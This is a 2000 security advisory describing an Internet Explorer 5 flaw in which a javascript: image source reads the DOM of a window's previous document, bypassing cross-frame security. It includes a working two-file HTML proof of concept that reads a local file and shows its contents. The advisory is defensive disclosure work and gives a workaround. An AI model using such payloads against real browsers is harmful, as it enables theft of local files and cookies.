Georgi Guninski security advisory #4, 2000

IE 5 security vulnerablity - circumventing Cross-frame security policy and accessing the DOM of "old" documents.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or  indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.01 under Windows 95 and 5.5 under WinNT 4.0 (suppose other versions are also vulnerable) allows circumventing "Cross frame security policy" by accessing the DOM of "old" documents using <IMG SRC="javascript:..."> and a design flaw in IE. This exposes the whole DOM of the target document and opens lots of security risks.
This allows reading local files, reading files from any host, window spoofing, getting cookies, etc.

Details:
This is a strange exploit. If you open a new document in a window that contains an old document, the old document's DOM may be accessed by the new document until the new document is completely parsed and displayed. Looks like IE keeps the old document until the new document is finally parsed and displayed. If you put a <IMG SRC="javascript:..."> in the new document, it has access to the old document's DOM.
Examine the source code for more info:

The code is:
-----------------img2main.html---------------------------------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\\test.txt and it will be read and shown in a message box");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links[0].click()",2000);
</SCRIPT>
---------------------------------------------------------------------

----------------img2.html--------------------------------------------
<HTML>
<IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your file:   \'+opener.document.body.innerText)');alert('Just an alert, but is necessary. Wait a little.')">
</HTML>
---------------------------------------------------------------------
 

Demonstration is available at: http://www.guninski.com/img2main.html

Workaround: Disable Active Scripting


| Home | Internet Explorer | Windows 2000 | AIX | Netscape | Greets | More... |